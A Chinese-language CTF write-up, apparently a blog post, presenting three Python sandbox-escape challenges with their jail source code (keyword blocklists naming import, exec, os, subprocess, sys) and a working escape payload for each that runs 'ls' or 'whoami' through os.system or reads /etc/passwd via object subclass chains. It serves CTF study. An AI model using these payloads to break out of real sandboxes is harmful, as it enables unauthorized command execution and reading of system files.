第一道

from __future__ import print_function

print("Welcome to my Python sandbox! Enter commands below!")

banned = [

    "import",

    "exec",

    "eval",

    "pickle",

    "os",

    "subprocess",

    "kevin sucks",

    "input",

    "banned",

    "cry sum more",

    "sys"

]

targets =__builtins__.__dict__.keys()

targets.remove('raw_input')

targets.remove('print')

for x in targets:

    del __builtins__.__dict__[x]

while 1:

    print(">>>", end=' ')

    data = raw_input()

    for no in banned:

        if no.lower() in data.lower():

            print("Nobueno")

            break

    else: # this means nobreak

        exec data

payload: ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')

第二道

#!/usr/bin/env python

from re import findall

def make_secure():

    UNSAFE = ['open',

              'file',

              'execfile',

              'compile',

              'reload',

              '__import__',

              'eval',

              'input']

    for func in UNSAFE:

        del __builtins__.__dict__[func]

# Remove dangerous builtins

make_secure()

print 'Go Ahead, Expoit me >;D'

while True:

    try:

        print ">>>",

        # Read user input until the first whitespace character

        inp = findall('\S+', raw_input())[0]

        a = None

        # Set a to the result from executing the user input

        exec 'a=' + inp

        print 'Return Value:', a

    except Exception, e:

        print 'Exception:', e

payload:().class.bases[0].subclasses()[40]("/etc/passwd").read()

前两道环境是py2,第三道是py3

第三道

# -*-coding:utf-8-*-  

#!/usr/bin/python3

import sys, cmd, os  

del __builtins__.__dict__['__import__']

del __builtins__.__dict__['eval']  

intro = """

pwnhub cuit

pwn everything

Rules:

 -No import

 -No ...

 -No flag 

"""  

def execute(command):

    exec(command, globals())  

class Jail(cmd.Cmd):

 prompt     = '>>> '

 filtered    = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|')  

 def do_EOF(self, line):

     sys.exit()  

 def emptyline(self):

     return cmd.Cmd.emptyline(self)  

 def default(self, line):

     sys.stdout.write('\x00')  

 def postcmd(self, stop, line):

     if any(f in line for f in self.filtered):

         print("You are a big hacker !!!")

         print("Go away")

     else:

        try:

             execute(line)

        except NameError:

             print("NameError: name '%s' is not defined" % line)

        except Exception:

             print("Error: %s" % line)

     return cmd.Cmd.postcmd(self, stop, line)  

if __name__ == "__main__":

 try:

     Jail().cmdloop(intro)

 except KeyboardInterrupt:

     print("\rSee you next time !")

payload:print(getattr(os, "system")("whoami"))

等有空好好看看python面向对象的那一块知识

参考链接:

http://www.php.cn/python-tutorials-356723.html

http://blog.51cto.com/13620939/2075204

https://xz.aliyun.com/t/52#toc-0

http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/

http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/

python沙箱逃逸的几道题的更多相关文章

  1. CTF python沙箱逃逸进阶题目

    future引用了python3的新特性,所以是不能直接回回显,得用print file函数可以读取. print(().__class__.__bases__[0].__subclasses__() ...

  2. 一道简单的CTFpython沙箱逃逸题目

    看了几天的ssti注入然后了解到有python沙箱逃逸 学过ssti注入的话python沙箱逃逸还是很容易理解的. 看一道CTF题目,源码的话我改了改,一开始不能用,直接在py2上运行就好. 题目要求 ...

  3. NodeJS沙箱逃逸&&vm

    NodeJS沙箱逃逸 关于nodejs的沙箱 使用场景 在线代码编辑器 第三方js代码 jsonp,like百度搜索框 https://www.baidu.com/s?wd=nodejs&mi ...

  4. 刚毕业去面试Python工程师,这几道题太难了,Python面试题No11

    写在前面 本想停一段时间这个系列,但是好多朋友给我发信息说让我继续整理下去,so,继续吧~ 第1题: docstring是什么? docstring是一种文档字符串,用于解释构造的作用.我们在函数.类 ...

  5. python知识点总结以及15道题的解析

    先看知识点总结 一.序列操作符x in s 如果x是列表s的元素,返回True,否则Falses + t 连接两个序列s和ts*n或者n*s 将序列s复制n次s[i] 返回s中第i元素s[i:j]或s ...

  6. CVE-2021-26119 PHP Smarty 模版沙箱逃逸远程代码执行漏洞

    0x00 漏洞介绍 smarty是一个基于PHP开发的PHP模板引擎.它提供了逻辑与外在内容的分离,简单的讲,目的就是要使用PHP程序员同美工分离,使用的程序员改变程序的逻辑内容不会影响到美工的页面设 ...

  7. 【安全开发】python安全编码规范

    申明:本文非笔者原创,原文转载自:https://github.com/SecurityPaper/SecurityPaper-web/blob/master/_posts/2.SDL%E8%A7%8 ...

  8. 2017CUIT校赛-线上赛

    2017Pwnhub杯-CUIT校赛 这是CUIT第十三届校赛啦,也是我参加的第一次校赛. 在被虐到崩溃的过程中也学到了一些东西. 这次比赛是从5.27早上十点打到5.28晚上十点,共36小时,中间睡 ...

  9. 2.SDL规范文档

    01.安全设计Checklist 输入验证 校验跨信任边界传递的不可信数据(策略检查数据合法性,含白名单机制等)格式化字符串时,依然要检验用户输入的合法性,避免可造成系统信息泄露或者拒绝服务 禁止向J ...

随机推荐

  1. Knockout.js Attr绑定

    <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8&quo ...

  2. 如何在 Azure 中创建 ASP.NET Web 应用

    Azure Web 应用提供高度可缩放.自修补的 Web 托管服务. 本快速入门演示如何将第一个 ASP.NET Web 应用部署到 Azure Web 应用中. 完成后,便拥有了一个资源组,该资源组 ...

  3. 经典的SQL面试题及答案

    ​ ​ ​ ​ ​ ​​​​​ ​ ​​​​​​​​

  4. spring cloud 注册、发现、消费、负载均衡

  5. linux ubuntu 学习总结(day01)基本命令学习

    个人总结,请尊重版权,转载请在显眼地方注明出处:https://www.cnblogs.com/sunshine5683/p/9948259.html day(01)基本命令学习 今天开始自学linu ...

  6. [LeetCode] Add Two Numbers题解

    Add Two Numbers: You are given two non-empty linked lists representing two non-negative integers. Th ...

  7. CodeForce 614B Gena's Code(水题)

    这道题提醒我两点: 1.break时一定要检查清楚 2.字符串直接赋值一定要注意结束符,最好能用strcpy 以上是debug的惨痛教训 #include <iostream> #incl ...

  8. zoj 3747 (DP)(连续至多,连续至少)

    http://acm.zju.edu.cn/onlinejudge/showProblem.do?problemId=5170 参考: http://blog.csdn.net/cc_again/ar ...

  9. CODEFORCES 429B 动态规划

    http://codeforces.com/problemset/problem/429/B 可以参考这篇文章: http://blog.csdn.net/pure_lady/article/deta ...

  10. Redis概述与安装

    一.什么是Redis ​ 由c语言编写的,以键值对的形式存储的数据库. 缓存技术(驻留在内存中) ​ key:value ​ 支持5种数据类型: ​ String ​ Hash(哈希表) ​ list ...